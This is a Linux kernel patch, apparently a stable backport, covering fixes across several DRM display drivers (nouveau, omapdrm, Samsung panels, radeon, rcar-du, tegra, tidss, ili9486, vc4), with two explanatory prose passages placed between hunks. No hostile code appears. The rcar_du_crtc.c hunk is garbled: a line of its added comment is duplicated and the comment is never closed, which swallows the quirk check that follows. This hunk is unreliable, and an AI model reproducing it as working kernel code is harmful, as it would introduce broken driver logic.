+@@ -3,6 +3,7 @@
+ #define __NVIF_OUTP_H__
+ #include <nvif/object.h>
+ #include <nvif/if0012.h>
++#include <drm/display/drm_dp.h>
+ struct nvif_disp;
+ 
+ struct nvif_outp {
+@@ -21,7 +22,7 @@ int nvif_outp_acquire_rgb_crt(struct nvif_outp *);
+ int nvif_outp_acquire_tmds(struct nvif_outp *, int head,
+ 			   bool hdmi, u8 max_ac_packet, u8 rekey, u8 scdc, bool hda);
+ int nvif_outp_acquire_lvds(struct nvif_outp *, bool dual, bool bpc8);
+-int nvif_outp_acquire_dp(struct nvif_outp *, u8 dpcd[16],
++int nvif_outp_acquire_dp(struct nvif_outp *outp, u8 dpcd[DP_RECEIVER_CAP_SIZE],
+ 			 int link_nr, int link_bw, bool hda, bool mst);
+ void nvif_outp_release(struct nvif_outp *);
+ int nvif_outp_infoframe(struct nvif_outp *, u8 type, struct nvif_outp_infoframe_v0 *, u32 size);
+diff --git a/drivers/gpu/drm/nouveau/nvif/outp.c b/drivers/gpu/drm/nouveau/nvif/outp.c
+index 7da39f1eae9fb..c24bc5eae3ecf 100644
+--- a/drivers/gpu/drm/nouveau/nvif/outp.c
++++ b/drivers/gpu/drm/nouveau/nvif/outp.c
+@@ -127,7 +127,7 @@ nvif_outp_acquire(struct nvif_outp *outp, u8 proto, struct nvif_outp_acquire_v0
+ }
+ 
+ int
+-nvif_outp_acquire_dp(struct nvif_outp *outp, u8 dpcd[16],
++nvif_outp_acquire_dp(struct nvif_outp *outp, u8 dpcd[DP_RECEIVER_CAP_SIZE],
+ 		     int link_nr, int link_bw, bool hda, bool mst)
+ {
+ 	struct nvif_outp_acquire_v0 args;
+diff --git a/drivers/gpu/drm/omapdrm/dss/dsi.c b/drivers/gpu/drm/omapdrm/dss/dsi.c
+index a6845856cbce4..4c1084eb01759 100644
+--- a/drivers/gpu/drm/omapdrm/dss/dsi.c
++++ b/drivers/gpu/drm/omapdrm/dss/dsi.c
+@@ -1039,22 +1039,26 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ {
+ 	struct dsi_data *dsi = s->private;
+ 	unsigned long flags;
+-	struct dsi_irq_stats stats;
++	struct dsi_irq_stats *stats;
++
++	stats = kmalloc(sizeof(*stats), GFP_KERNEL);
++	if (!stats)
++		return -ENOMEM;
+ 
+ 	spin_lock_irqsave(&dsi->irq_stats_lock, flags);
+ 
+-	stats = dsi->irq_stats;
++	*stats = dsi->irq_stats;
+ 	memset(&dsi->irq_stats, 0, sizeof(dsi->irq_stats));
+ 	dsi->irq_stats.last_reset = jiffies;
+ 
+ 	spin_unlock_irqrestore(&dsi->irq_stats_lock, flags);
+ 
+ 	seq_printf(s, "period %u ms\n",
+-			jiffies_to_msecs(jiffies - stats.last_reset));
++			jiffies_to_msecs(jiffies - stats->last_reset));
+ 
+-	seq_printf(s, "irqs %d\n", stats.irq_count);
++	seq_printf(s, "irqs %d\n", stats->irq_count);
+ #define PIS(x) \
+-	seq_printf(s, "%-20s %10d\n", #x, stats.dsi_irqs[ffs(DSI_IRQ_##x)-1]);
++	seq_printf(s, "%-20s %10d\n", #x, stats->dsi_irqs[ffs(DSI_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- DSI%d interrupts --\n", dsi->module_id + 1);
+ 	PIS(VC0);
+@@ -1078,10 +1082,10 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d %10d %10d %10d\n", #x, \
+-			stats.vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
++			stats->vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- VC interrupts --\n");
+ 	PIS(CS);
+@@ -1097,7 +1101,7 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d\n", #x, \
+-			stats.cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
++			stats->cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- CIO interrupts --\n");
+ 	PIS(ERRSYNCESC1);
+@@ -1122,6 +1126,8 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 	PIS(ULPSACTIVENOT_ALL1);
+ #undef PIS
+ 
++	kfree(stats);
++
+ 	return 0;
+ }
+ #endif
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index 5cb8dc2ebe184..ef70928c3ccbc 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -1891,7 +1891,7 @@ static const struct edp_panel_entry edp_panels[] = {
+ 	EDP_PANEL_ENTRY('C', 'M', 'N', 0x1247, &delay_200_500_e80_d50, "N120ACA-EA1"),
+ 
+ 	EDP_PANEL_ENTRY('I', 'V', 'O', 0x057d, &delay_200_500_e200, "R140NWF5 RH"),
+-	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "M133NW4J-R3"),
++	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "R133NW4K-R0"),
+ 
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x0624, &kingdisplay_kd116n21_30nv_a010.delay, "116N21-30NV-A010"),
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x1120, &delay_200_500_e80_d50, "116N29-30NK-C007"),
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+index 5c621b15e84c2..439ef30735128 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+@@ -692,7 +692,9 @@ static int s6e3ha2_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS;
++	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS |
++		MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP |
++		MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+index e06fd35de814b..9c3e76171759a 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+@@ -446,7 +446,8 @@ static int s6e63j0x03_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 1;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_MODE_NO_EOT_PACKET;
++	dsi->mode_flags = MIPI_DSI_MODE_VIDEO_NO_HFP |
++		MIPI_DSI_MODE_VIDEO_NO_HBP | MIPI_DSI_MODE_VIDEO_NO_HSA;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+index 54213beafaf5e..ebf4c2d39ea88 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+@@ -990,8 +990,6 @@ static int s6e8aa0_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST
+-		| MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP
+-		| MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET
+ 		| MIPI_DSI_MODE_VSYNC_FLUSH | MIPI_DSI_MODE_VIDEO_AUTO_VERT;
+ 
+ 	ret = s6e8aa0_parse_dt(ctx);
+diff --git a/drivers/gpu/drm/radeon/atombios_encoders.c b/drivers/gpu/drm/radeon/atombios_encoders.c
+index c841c273222e7..3e24fa11d4d38 100644
+--- a/drivers/gpu/drm/radeon/atombios_encoders.c
++++ b/drivers/gpu/drm/radeon/atombios_encoders.c
+@@ -2122,11 +2122,12 @@ int radeon_atom_pick_dig_encoder(struct drm_encoder *encoder, int fe_idx)
+ 
+ 	/*
+ 	 * On DCE32 any encoder can drive any block so usually just use crtc id,
+-	 * but Apple thinks different at least on iMac10,1, so there use linkb,
++	 * but Apple thinks different at least on iMac10,1 and iMac11,2, so use linkb there,
+ 	 * otherwise the internal eDP panel will stay dark.
+ 	 */
+ 	if (ASIC_IS_DCE32(rdev)) {
+-		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1"))
++		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1") ||
++		    dmi_match(DMI_PRODUCT_NAME, "iMac11,2"))
+ 			enc_idx = (dig->linkb) ? 1 : 0;
+ 		else
+ 			enc_idx = radeon_crtc->crtc_id;
+diff --git a/drivers/gpu/drm/radeon/radeon_device.c b/drivers/gpu/drm/radeon/radeon_device.c
+index 6344454a77217..4f9729b4a8119 100644
+--- a/drivers/gpu/drm/radeon/radeon_device.c
++++ b/drivers/gpu/drm/radeon/radeon_device.c
+@@ -1023,6 +1023,7 @@ void radeon_atombios_fini(struct radeon_device *rdev)
+ {
+ 	if (rdev->mode_info.atom_context) {
+ 		kfree(rdev->mode_info.atom_context->scratch);
++		kfree(rdev->mode_info.atom_context->iio);
+ 	}
+ 	kfree(rdev->mode_info.atom_context);
+ 	rdev->mode_info.atom_context = NULL;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+index 3619e1ddeb620..b7dd59fe119e6 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/mutex.h>
+ #include <linux/platform_device.h>
+-#include <linux/sys_soc.h>
+ 
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -204,11 +203,6 @@ static void rcar_du_escr_divider(struct clk *clk, unsigned long target,
+ 	}
+ }
+ 
+-static const struct soc_device_attribute rcar_du_r8a7795_es1[] = {
+-	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+-	{ /* sentinel */ }
+-};
+-
+ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ {
+ 	const struct drm_display_mode *mode = &rcrtc->crtc.state->adjusted_mode;
+@@ -238,7 +232,7 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		 * no post-divider when a display PLL is present (as shown by
+ 		 * the workaround breaking HDMI output on M3-W during testing).
+ 		 */
+-		if (soc_device_match(rcar_du_r8a7795_es1)) {
++		if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY) {
+ 			target *= 2;
+ 			div = 1;
+ 		}
+@@ -251,13 +245,30 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		       | DPLLCR_N(dpll.n) | DPLLCR_M(dpll.m)
+ 		       | DPLLCR_STBY;
+ 
+-		if (rcrtc->index == 1)
++		if (rcrtc->index == 1) {
+ 			dpllcr |= DPLLCR_PLCS1
+ 			       |  DPLLCR_INCS_DOTCLKIN1;
+-		else
+-			dpllcr |= DPLLCR_PLCS0
++		} else {
++			dpllcr |= DPLLCR_PLCS0_PLL
+ 			       |  DPLLCR_INCS_DOTCLKIN0;
+ 
++			/*
++			 * On ES2.x we have a single mux controlled via bit 21,
++			 * which selects between DCLKIN source (bit 21 = 0) and
++			 * a PLL source (bit 21 = 1), where the PLL is always
++			 * PLL1.
++			 *
++			 * On ES1.x we have an additional mux, controlled
++			 * via bit 20, for choosing between PLL0 (bit 20 = 0)
++			 * and PLL1 (bit 20 = 1). We always want to use PLL1,
++			 * so on ES1.x, in addition to setting bit 21, we need
++			 * to set the bit 20.
++			 * to set bit 20.
++
++			if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PLL)
++				dpllcr |= DPLLCR_PLCS0_H3ES1X_PLL1;
++		}
++
+ 		rcar_du_group_write(rcrtc->group, DPLLCR, dpllcr);
+ 
+ 		escr = ESCR_DCLKSEL_DCLKIN | div;
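
For reference, the DPLLCR bit values behind this change, taken from the
rcar_du_regs.h hunk later in this patch:

	old: DPLLCR_PLCS0             = 3 << 20 = 0x300000  (bits 21 and 20,
	                                                     set unconditionally)
	new: DPLLCR_PLCS0_PLL         = 1 << 21 = 0x200000  (PLL source, always set)
	     DPLLCR_PLCS0_H3ES1X_PLL1 = 1 << 20 = 0x100000  (PLL1 select,
	                                                     H3 ES1.x only)

Setting bit 20 unconditionally only happened to work because the other Gen3
SoCs do not implement it; gating it on the new quirk makes the ES1.x special
case explicit.
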
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.c b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+index d003e8d9e7a26..53c9669a3851c 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+@@ -16,6 +16,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/slab.h>
++#include <linux/sys_soc.h>
+ #include <linux/wait.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+@@ -386,6 +387,43 @@ static const struct rcar_du_device_info rcar_du_r8a7795_info = {
+ 	.dpll_mask =  BIT(2) | BIT(1),
+ };
+ 
++static const struct rcar_du_device_info rcar_du_r8a7795_es1_info = {
++	.gen = 3,
++	.features = RCAR_DU_FEATURE_CRTC_IRQ
++		  | RCAR_DU_FEATURE_CRTC_CLOCK
++		  | RCAR_DU_FEATURE_VSP1_SOURCE
++		  | RCAR_DU_FEATURE_INTERLACED
++		  | RCAR_DU_FEATURE_TVM_SYNC,
++	.quirks = RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY
++		| RCAR_DU_QUIRK_H3_ES1_PLL,
++	.channels_mask = BIT(3) | BIT(2) | BIT(1) | BIT(0),
++	.routes = {
++		/*
++		 * R8A7795 has one RGB output, two HDMI outputs and one
++		 * LVDS output.
++		 */
++		[RCAR_DU_OUTPUT_DPAD0] = {
++			.possible_crtcs = BIT(3),
++			.port = 0,
++		},
++		[RCAR_DU_OUTPUT_HDMI0] = {
++			.possible_crtcs = BIT(1),
++			.port = 1,
++		},
++		[RCAR_DU_OUTPUT_HDMI1] = {
++			.possible_crtcs = BIT(2),
++			.port = 2,
++		},
++		[RCAR_DU_OUTPUT_LVDS0] = {
++			.possible_crtcs = BIT(0),
++			.port = 3,
++		},
++	},
++	.num_lvds = 1,
++	.num_rpf = 5,
++	.dpll_mask =  BIT(2) | BIT(1),
++};
++
+ static const struct rcar_du_device_info rcar_du_r8a7796_info = {
+ 	.gen = 3,
+ 	.features = RCAR_DU_FEATURE_CRTC_IRQ
+@@ -554,6 +592,11 @@ static const struct of_device_id rcar_du_of_table[] = {
+ 
+ MODULE_DEVICE_TABLE(of, rcar_du_of_table);
+ 
++static const struct soc_device_attribute rcar_du_soc_table[] = {
++	{ .soc_id = "r8a7795", .revision = "ES1.*", .data = &rcar_du_r8a7795_es1_info },
++	{ /* sentinel */ }
++};
++
+ const char *rcar_du_output_name(enum rcar_du_output output)
+ {
+ 	static const char * const names[] = {
+@@ -645,6 +688,7 @@ static void rcar_du_shutdown(struct platform_device *pdev)
+ 
+ static int rcar_du_probe(struct platform_device *pdev)
+ {
++	const struct soc_device_attribute *soc_attr;
+ 	struct rcar_du_device *rcdu;
+ 	unsigned int mask;
+ 	int ret;
+@@ -659,8 +703,13 @@ static int rcar_du_probe(struct platform_device *pdev)
+ 		return PTR_ERR(rcdu);
+ 
+ 	rcdu->dev = &pdev->dev;
++
+ 	rcdu->info = of_device_get_match_data(rcdu->dev);
+ 
++	soc_attr = soc_device_match(rcar_du_soc_table);
++	if (soc_attr)
++		rcdu->info = soc_attr->data;
++
+ 	platform_set_drvdata(pdev, rcdu);
+ 
+ 	/* I/O resources */
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.h b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+index 5cfa2bb7ad93d..acc3673fefe18 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+@@ -34,6 +34,8 @@ struct rcar_du_device;
+ #define RCAR_DU_FEATURE_NO_BLENDING	BIT(5)	/* PnMR.SPIM does not have ALP nor EOR bits */
+ 
+ #define RCAR_DU_QUIRK_ALIGN_128B	BIT(0)	/* Align pitches to 128 bytes */
++#define RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY BIT(1)	/* H3 ES1 has pclk stability issue */
++#define RCAR_DU_QUIRK_H3_ES1_PLL	BIT(2)	/* H3 ES1 PLL setup differs from non-ES1 */
+ 
+ enum rcar_du_output {
+ 	RCAR_DU_OUTPUT_DPAD0,
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_regs.h b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+index c1bcb0e8b5b4e..789ae9285108e 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_regs.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+@@ -283,12 +283,8 @@
+ #define DPLLCR			0x20044
+ #define DPLLCR_CODE		(0x95 << 24)
+ #define DPLLCR_PLCS1		(1 << 23)
+-/*
+- * PLCS0 is bit 21, but H3 ES1.x requires bit 20 to be set as well. As bit 20
+- * isn't implemented by other SoC in the Gen3 family it can safely be set
+- * unconditionally.
+- */
+-#define DPLLCR_PLCS0		(3 << 20)
++#define DPLLCR_PLCS0_PLL	(1 << 21)
++#define DPLLCR_PLCS0_H3ES1X_PLL1	(1 << 20)
+ #define DPLLCR_CLKE		(1 << 18)
+ #define DPLLCR_FDPLL(n)		((n) << 12)
+ #define DPLLCR_N(n)		((n) << 5)
+diff --git a/drivers/gpu/drm/tegra/firewall.c b/drivers/gpu/drm/tegra/firewall.c
+index 1824d2db0e2ce..d53f890fa6893 100644
+--- a/drivers/gpu/drm/tegra/firewall.c
++++ b/drivers/gpu/drm/tegra/firewall.c
+@@ -97,6 +97,9 @@ static int fw_check_regs_imm(struct tegra_drm_firewall *fw, u32 offset)
+ {
+ 	bool is_addr;
+ 
++	if (!fw->client->ops->is_addr_reg)
++		return 0;
++
+ 	is_addr = fw->client->ops->is_addr_reg(fw->client->base.dev, fw->class,
+ 					       offset);
+ 	if (is_addr)
+diff --git a/drivers/gpu/drm/tidss/tidss_dispc.c b/drivers/gpu/drm/tidss/tidss_dispc.c
+index ad93acc9abd2a..16301bdfead12 100644
+--- a/drivers/gpu/drm/tidss/tidss_dispc.c
++++ b/drivers/gpu/drm/tidss/tidss_dispc.c
+@@ -1858,8 +1858,8 @@ static const struct {
+ 	{ DRM_FORMAT_XBGR4444, 0x21, },
+ 	{ DRM_FORMAT_RGBX4444, 0x22, },
+ 
+-	{ DRM_FORMAT_ARGB1555, 0x25, },
+-	{ DRM_FORMAT_ABGR1555, 0x26, },
++	{ DRM_FORMAT_XRGB1555, 0x25, },
++	{ DRM_FORMAT_XBGR1555, 0x26, },
+ 
+ 	{ DRM_FORMAT_XRGB8888, 0x27, },
+ 	{ DRM_FORMAT_XBGR8888, 0x28, },
+diff --git a/drivers/gpu/drm/tiny/ili9486.c b/drivers/gpu/drm/tiny/ili9486.c
+index 1bb847466b107..a63b15817f112 100644
+--- a/drivers/gpu/drm/tiny/ili9486.c
++++ b/drivers/gpu/drm/tiny/ili9486.c
+@@ -43,6 +43,7 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 			     size_t num)
+ {
+ 	struct spi_device *spi = mipi->spi;
++	unsigned int bpw = 8;
+ 	void *data = par;
+ 	u32 speed_hz;
+ 	int i, ret;
+@@ -56,8 +57,6 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 	 * The displays are Raspberry Pi HATs and connected to the 8-bit only
+ 	 * SPI controller, so 16-bit command and parameters need byte swapping
+ 	 * before being transferred as 8-bit on the big endian SPI bus.
+-	 * Pixel data bytes have already been swapped before this function is
+-	 * called.
+ 	 */
+ 	buf[0] = cpu_to_be16(*cmd);
+ 	gpiod_set_value_cansleep(mipi->dc, 0);
+@@ -71,12 +70,18 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 		for (i = 0; i < num; i++)
+ 			buf[i] = cpu_to_be16(par[i]);
+ 		num *= 2;
+-		speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
+ 		data = buf;
+ 	}
+ 
++	/*
++	 * Check whether pixel data bytes need to be swapped or not
++	 */
++	if (*cmd == MIPI_DCS_WRITE_MEMORY_START && !mipi->swap_bytes)
++		bpw = 16;
++
+ 	gpiod_set_value_cansleep(mipi->dc, 1);
+-	ret = mipi_dbi_spi_transfer(spi, speed_hz, 8, data, num);
++	speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
++	ret = mipi_dbi_spi_transfer(spi, speed_hz, bpw, data, num);
+  free:
+ 	kfree(buf);
+ 
+diff --git a/drivers/gpu/drm/vc4/vc4_dpi.c b/drivers/gpu/drm/vc4/vc4_dpi.c
+index 1f8f44b7b5a5f..61ef7d232a12c 100644
+--- a/drivers/gpu/drm/vc4/vc4_dpi.c
++++ b/drivers/gpu/drm/vc4/vc4_dpi.c
+@@ -179,7 +179,7 @@ static void vc4_dpi_encoder_enable(struct drm_encoder *encoder)
+ 						       DPI_FORMAT);
+ 				break;
+ 			case MEDIA_BUS_FMT_RGB565_1X16:
+-				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_3,
++				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_1,
+ 						       DPI_FORMAT);
+ 				break;
+ 			default:
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index 7546103f14997..3f3f94e7b8339 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -406,6 +406,7 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ {
+ 	struct drm_connector *connector = &vc4_hdmi->connector;
+ 	struct edid *edid;
++	int ret;
+ 
+ 	/*
+ 	 * NOTE: This function should really be called with
+@@ -434,7 +435,15 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ 	cec_s_phys_addr_from_edid(vc4_hdmi->cec_adap, edid);
+ 	kfree(edid);
+ 
+-	vc4_hdmi_reset_link(connector, ctx);
++	for (;;) {
++		ret = vc4_hdmi_reset_link(connector, ctx);
++		if (ret == -EDEADLK) {
++			drm_modeset_backoff(ctx);
++			continue;
++		}
++
++		break;
++	}
+ }
+ 
+ static int vc4_hdmi_connector_detect_ctx(struct drm_connector *connector,
+@@ -1302,11 +1311,12 @@ static void vc5_hdmi_set_timings(struct vc4_hdmi *vc4_hdmi,
+ 		     VC4_SET_FIELD(mode->crtc_vdisplay, VC5_HDMI_VERTA_VAL));
+ 	u32 vertb = (VC4_SET_FIELD(mode->htotal >> (2 - pixel_rep),
+ 				   VC5_HDMI_VERTB_VSPO) |
+-		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end,
++		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end +
++				   interlaced,
+ 				   VC4_HDMI_VERTB_VBP));
+ 	u32 vertb_even = (VC4_SET_FIELD(0, VC5_HDMI_VERTB_VSPO) |
+ 			  VC4_SET_FIELD(mode->crtc_vtotal -
+-					mode->crtc_vsync_end - interlaced,
++					mode->crtc_vsync_end,
+ 					VC4_HDMI_VERTB_VBP));
+ 	unsigned long flags;
+ 	unsigned char gcp;
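
The hotplug retry loop above follows the standard drm_modeset_acquire_ctx
contract: any helper that takes modeset locks may fail with -EDEADLK, and the
caller must drop its locks with drm_modeset_backoff() and try again. In vc4
the acquire context is owned further up the call chain, so only the loop
appears in the hunk; the full canonical shape looks roughly like this, where
do_something_locked() and connector stand in for any lock-taking helper and
its object:

	#include <drm/drm_modeset_lock.h>

	struct drm_modeset_acquire_ctx ctx;
	int ret;

	drm_modeset_acquire_init(&ctx, 0);
retry:
	ret = do_something_locked(connector, &ctx);	/* may return -EDEADLK */
	if (ret == -EDEADLK) {
		drm_modeset_backoff(&ctx);	/* drop held locks, wait, retry */
		goto retry;
	}
	drm_modeset_drop_locks(&ctx);
	drm_modeset_acquire_fini(&ctx);
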
+diff --git a/drivers/gpu/drm/vc4/vc4_hvs.c b/drivers/gpu/drm/vc4/vc4_hvs.c
+index c4453a5ae163a..d9fc0d03023b0 100644
+--- a/drivers/gpu/drm/vc4/vc4_hvs.c
++++ b/drivers/gpu/drm/vc4/vc4_hvs.c
+@@ -370,28 +370,30 @@ static int vc4_hvs_init_channel(struct vc4_hvs *hvs, struct drm_crtc *crtc,
+ 	 * mode.
+ 	 */
+ 	dispctrl = SCALER_DISPCTRLX_ENABLE;
++	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 
+-	if (!vc4->is_vc5)
++	if (!vc4->is_vc5) {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
+ 					  SCALER_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER_DISPCTRLX_ONESHOT : 0);
+-	else
++		dispbkgndx |= SCALER_DISPBKGND_AUTOHS;
++	} else {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
+ 					  SCALER5_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER5_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER5_DISPCTRLX_ONESHOT : 0);
++		dispbkgndx &= ~SCALER5_DISPBKGND_BCK2BCK;
++	}
+ 
+ 	HVS_WRITE(SCALER_DISPCTRLX(chan), dispctrl);
+ 
+-	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 	dispbkgndx &= ~SCALER_DISPBKGND_GAMMA;
+ 	dispbkgndx &= ~SCALER_DISPBKGND_INTERLACE;
+ 
+ 	HVS_WRITE(SCALER_DISPBKGNDX(chan), dispbkgndx |
+-		  SCALER_DISPBKGND_AUTOHS |
+ 		  ((!vc4->is_vc5) ? SCALER_DISPBKGND_GAMMA : 0) |
+ 		  (interlace ? SCALER_DISPBKGND_INTERLACE : 0));
+ 
+@@ -658,7 +660,8 @@ void vc4_hvs_mask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl &= ~SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl &= ~(hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					 SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
+@@ -675,7 +678,8 @@ void vc4_hvs_unmask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl |= SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl |= (hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPSTAT,
+ 		  SCALER_DISPSTAT_EUFLOW(channel));
+@@ -701,6 +705,7 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	int channel;
+ 	u32 control;
+ 	u32 status;
++	u32 dspeislur;
+ 
+ 	/*
+ 	 * NOTE: We don't need to protect the register access using
+@@ -717,9 +722,11 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	control = HVS_READ(SCALER_DISPCTRL);
+ 
+ 	for (channel = 0; channel < SCALER_CHANNELS_COUNT; channel++) {
++		dspeislur = vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					  SCALER_DISPCTRL_DSPEISLUR(channel);
+ 		/* Interrupt masking is not always honored, so check it here. */
+ 		if (status & SCALER_DISPSTAT_EUFLOW(channel) &&
+-		    control & SCALER_DISPCTRL_DSPEISLUR(channel)) {
++		    control & dspeislur) {
